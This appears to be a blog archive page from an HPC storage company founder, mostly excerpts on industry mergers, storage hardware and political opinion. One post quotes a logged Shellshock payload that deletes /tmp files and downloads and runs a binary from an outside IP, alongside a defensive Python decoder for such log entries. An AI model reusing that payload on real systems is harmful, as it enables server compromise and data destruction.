Neither one is computer related. Both are based upon what I see as unmet needs for various groups. One is definitely a “gotta have” for one group. For the other group, there is one “solution” on the market that I looked at, and it’s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about via Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
SSD/flash/memory shortage, day N+1
There has been a huge demand for SSD/Flash/memory components from a number of end users. Sadly not the day job’s customers … but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Coupling that with a (mis)expectation of continuously falling prices across the board leads to interesting conversations with customers. We’ve tried to set expectations appropriately, but we’ve been bitten in the past by doing just this.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
Attempting, and to some degree, failing, to prevent a user from accruing technical debt
We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things … I won’t be judgemental … but I will be frank, and sometimes, this doesn’t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.
Posts
"No, really, we are different than all the others you worked with"
Thus ended the plaintive cry of a management consultant hawking their wares, promising us high level meetings with “customers” with “budgets” in our space. This isn’t to say we don’t want more customers, we do. We always need more (and repeat) customers … this is the nature of our business. What we don’t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid, and that … the pay for play, is their business.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Scalable Informatics 13th year anniversary on Saturday
We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there … hired lots of folks, pursued lots of business.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and the culture/people fit matters. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales, and put their code upon their partners’ hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is)? Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. It’s April fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and it’s setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Thoughts after a small capital raise
So the day job did a small capital raise. Not a huge amount, but helpful for some day to day stuff. We did this in part because a larger effort we were working on stalled for reasons I won’t go into here. Looking at where we are and where we need to be, I am amazed at the profound need for performance throughout the hyperconverged space, and blown away that we appear to be the only one focused upon it.
Posts
The world’s fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, who worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
M&A in our space
The day job’s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. It’s not always right. It’s a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those who create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
Let’s see if this actually materializes. It’s pretty obvious how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites. The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Dead on correct article
What many of us worried about years ago was whether or not we were electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don’t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. It’s quite refreshing to see this. It will get better over time. It’s running in our facility now, and likely we’ll have a few clones in the cloud as well. But that’s for later.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly who the target of the money grab was. And more importantly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to not be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Going over the (US fiscal) cliff
[update] There’s a good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so let’s do this. I don’t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. It’s a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … it’s not going very well at all.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
Beautiful smackdown
This is epic. As originally seen on @mndoci ’s twitter stream. Short version: Those who don’t have a clue, really … REALLY … shouldn’t write lengthy journal articles about what they don’t have a clue about. Lest they get smacked down. Like this. For some reason, it’s an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I’s there).
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
why do people double down when they are wrong?
And do it again,
… sooooo …. a public works project (bridge, dam, …) is equivalent in his eyes to …. a risk an entrepreneur takes? Seriously?
Erp …. it’s glaringly obvious who does not have an understanding. The worker in the private sector punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The “public sector” is a cost, something to be kept as small as possible so as not to drive those paying the public sector’s bills into the poor house.
Posts
How I'd like politicians to view entrepreneurs
Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.
Category: exercise
Posts
Three years
It’s been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. It’s an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
When you cross the rubicon
… from hobby and sport, to something more. I’ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy … no really … and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.
Category: exploits
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm, replacing 20-ish year old init style processing with a more legitimate control plane, and a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22

This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
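For reading log entries like this one, percent-decoding the request makes the intent much easier to see. Below is a minimal sketch using Python's standard `urllib.parse.unquote`. The `LOGGED` string is just the leading portion of the entry above, and the helper name `looks_like_shellshock` is my own invention for illustration, not part of any tool. It only decodes and inspects text, it never executes anything.

```python
from urllib.parse import unquote

# Leading portion of the logged request, copied from the log entry above.
LOGGED = "()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*"


def looks_like_shellshock(raw: str) -> bool:
    """Return True if the percent-decoded text contains the '() {' prefix.

    This is a crude heuristic (an assumption of this sketch): the bash hole
    is triggered by values that begin with a function definition, so the
    decoded text is checked for that marker. It is not a complete detector.
    """
    return "() {" in unquote(raw)


# Decode once so a human can read what the request was trying to run.
decoded = unquote(LOGGED)
print(decoded)
print(looks_like_shellshock(LOGGED))
```

Running the same decode over the full entry shows the rest of the chain: a download into /tmp, a chmod, and a generated Run.sh that launches the downloaded file.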
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Category: grids
Posts
OpenLDAP + sssd ... the simple guide
Ok. Here’s the problem. Small environment for customers, who are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
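The general shape of a divide and conquer run over sequence data can be sketched in a few lines. To be very clear, this is not the GenomeCluster code, and it is not the code from the linked article. It is a toy illustration under my own assumptions: FASTA text as input, a round-robin split, and a placeholder per-chunk function (`analyze_chunk`, which just measures sequence length) standing in for the real search tool. All function names here are hypothetical.

```python
from concurrent.futures import ThreadPoolExecutor


def parse_fasta(text):
    """Split FASTA text into a list of (header, sequence) records."""
    records, header, seq = [], None, []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith(">"):
            if header is not None:
                records.append((header, "".join(seq)))
            header, seq = line[1:], []
        else:
            seq.append(line)
    if header is not None:
        records.append((header, "".join(seq)))
    return records


def split_round_robin(records, n_chunks):
    """Deal records into n_chunks lists, remembering each original index."""
    chunks = [[] for _ in range(n_chunks)]
    for i, rec in enumerate(records):
        chunks[i % n_chunks].append((i, rec))
    return chunks


def analyze_chunk(chunk):
    """Placeholder for the real per-chunk computation (assumption)."""
    return [(i, header, len(seq)) for i, (header, seq) in chunk]


def run(text, n_chunks=2):
    """Divide the input, process the chunks concurrently, merge in order."""
    chunks = split_round_robin(parse_fasta(text), n_chunks)
    with ThreadPoolExecutor(max_workers=n_chunks) as pool:
        partials = list(pool.map(analyze_chunk, chunks))
    merged = sorted(r for part in partials for r in part)
    return [(header, value) for _, header, value in merged]
```

The caller only ever sees `run()`, which takes the same input and returns results in the same order as a serial pass would. That is the "comfortable interface" idea: the splitting and merging stay hidden.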
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
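To give a feel for what a multi-node JSON config of this kind might look like, here is a small sketch. The real schema lives in the git repository, so treat everything below as assumption: only the `n01-ipmi` section name comes from the post, while the `host`, `user`, and `password` keys, the addresses, and the `load_nodes` helper are hypothetical stand-ins.

```python
import json

# Hypothetical config: one section per node, keyed by node name.
# Key names are assumptions of this sketch, not the logger's actual schema.
EXAMPLE_CONFIG = """
{
  "n01-ipmi": {"host": "192.0.2.11", "user": "monitor", "password": "changeme"},
  "n02-ipmi": {"host": "192.0.2.12", "user": "monitor", "password": "changeme"}
}
"""

REQUIRED_KEYS = {"host", "user", "password"}


def load_nodes(text):
    """Parse the JSON text and return (name, host, user) for each node.

    Raises ValueError if a section is missing one of the assumed keys.
    Passwords are deliberately left out of the returned tuples.
    """
    config = json.loads(text)
    nodes = []
    for name, section in sorted(config.items()):
        missing = REQUIRED_KEYS - section.keys()
        if missing:
            raise ValueError(f"{name}: missing keys {sorted(missing)}")
        nodes.append((name, section["host"], section["user"]))
    return nodes


for name, host, user in load_nodes(EXAMPLE_CONFIG):
    print(f"{name}: would attach console logger to {host} as {user}")
```

Adding a node is then a matter of copying a section and changing the name and address, which is the "replicate the section" idea from the post.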
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are of the good folks at Microsoft (Bill Gates is giving the opening keynote): what specifically is their HPC initiative supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Category: hardware
Posts
With every update, MacOSX becomes harder to build for
Way back in the good old 90s, we had very different versions of various unix systems. SunOS/Solaris, Irix, AIX, HP/UX, this upstart Linux, and some BSD things floating about. Of course, windows NT and others were starting to peek out then, and they had a “POSIX subsystem”.
Cross platform builds were generally speaking, a nightmare. While POSIX is a spec, writing to it didn’t guarantee that your application would work on a range of machines and OSes.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook are releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
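For anyone who hasn't run into it, the operation GEMM computes in the BLAS convention is C ← αAB + βC. A deliberately naive pure Python sketch follows, just to make the definition concrete. This is the textbook triple loop, not the optimized or reduced precision code from the announcement, and the function name and list-of-lists layout are my own choices for illustration.

```python
def gemm(alpha, a, b, beta, c):
    """Return alpha * (a @ b) + beta * c for row-major list-of-lists matrices.

    a is m x k, b is k x n, c is m x n. A new matrix is returned and the
    inputs are left untouched.
    """
    m, k, n = len(a), len(b), len(b[0])
    if any(len(row) != k for row in a):
        raise ValueError("inner dimensions of a and b do not match")
    if len(c) != m or any(len(row) != n for row in c):
        raise ValueError("c must be m x n")

    out = []
    for i in range(m):
        row = []
        for j in range(n):
            # Dot product of row i of a with column j of b.
            acc = 0.0
            for p in range(k):
                acc += a[i][p] * b[p][j]
            row.append(alpha * acc + beta * c[i][j])
        out.append(row)
    return out


A = [[1, 2], [3, 4]]
B = [[5, 6], [7, 8]]
ZERO = [[0, 0], [0, 0]]
print(gemm(1.0, A, B, 0.0, ZERO))
```

Tuned libraries compute the same thing, but block the loops for cache, vectorize the inner product, and (in the reduced precision case) use narrower data types for the inputs.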
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Working on benchmarking ML frameworks
Nice machine we have here …
root@hermes:/data/tests# lspci | egrep -i '(AMD|NVidia)' | grep VGA
3b:00.0 VGA compatible controller: NVIDIA Corporation GP100GL (rev a1)
88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Vega 10 XTX [Radeon Vega Frontier Edition]

I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:

root@hermes:/data/tests# lscpu | grep "Model name"
Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.
